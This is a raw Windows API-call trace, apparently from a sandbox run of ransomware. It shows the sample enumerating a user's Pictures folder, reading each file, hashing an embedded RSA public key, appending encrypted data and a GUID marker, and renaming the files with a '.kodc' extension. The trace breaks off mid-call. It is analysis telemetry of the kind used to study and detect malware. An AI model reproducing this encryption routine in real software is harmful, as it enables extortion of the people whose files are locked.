HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.353] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.353] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.353] CloseHandle (hObject=0x5cc) returned 1 [0099.354] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9q1Th.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9q1th.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9q1Th.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9q1th.jpg.kodc")) returned 1 [0099.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.355] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.356] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x960af140, ftCreationTime.dwHighDateTime=0x1d5bc76, ftLastAccessTime.dwLowDateTime=0x5485b20, ftLastAccessTime.dwHighDateTime=0x1d5be65, ftLastWriteTime.dwLowDateTime=0x5485b20, ftLastWriteTime.dwHighDateTime=0x1d5be65, nFileSizeHigh=0x0, nFileSizeLow=0x16aa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a wV.png", cAlternateFileName="AWV~1.PNG")) returned 1 [0099.356] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\a wV.png") returned=".png" [0099.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\a wV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a wv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.357] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=92832) returned 1 [0099.357] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.359] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16a7a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.360] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.360] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.360] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x16aa0, lpOverlapped=0x0) returned 1 [0099.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.361] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.362] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.362] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.362] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.362] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.362] GetLastError () returned 0x0 [0099.362] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.362] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.362] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.362] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.362] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16aa0) returned 0x9ba6d90 [0099.363] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b968 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b9b0 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.363] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae98 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae80 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.364] GetCurrentThreadId () returned 0x42c [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5228 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.365] GetCurrentThreadId () returned 0x42c [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aeb0 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.367] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.367] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.367] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.367] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.367] CloseHandle (hObject=0x5cc) returned 1 [0099.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.372] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\a wV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a wv.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\a wV.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a wv.png.kodc")) returned 1 [0099.373] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e06f10, ftCreationTime.dwHighDateTime=0x1d5bea0, ftLastAccessTime.dwLowDateTime=0xf2792150, ftLastAccessTime.dwHighDateTime=0x1d5bfb8, ftLastWriteTime.dwLowDateTime=0xf2792150, ftLastWriteTime.dwHighDateTime=0x1d5bfb8, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AFUgSZtz3g.jpg", cAlternateFileName="AFUGSZ~1.JPG")) returned 1 [0099.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.373] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AFUgSZtz3g.jpg") returned=".jpg" [0099.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AFUgSZtz3g.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afugsztz3g.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.374] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=60992) returned 1 [0099.374] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.376] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xee1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.376] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.377] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.377] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xee40, lpOverlapped=0x0) returned 1 [0099.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.378] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 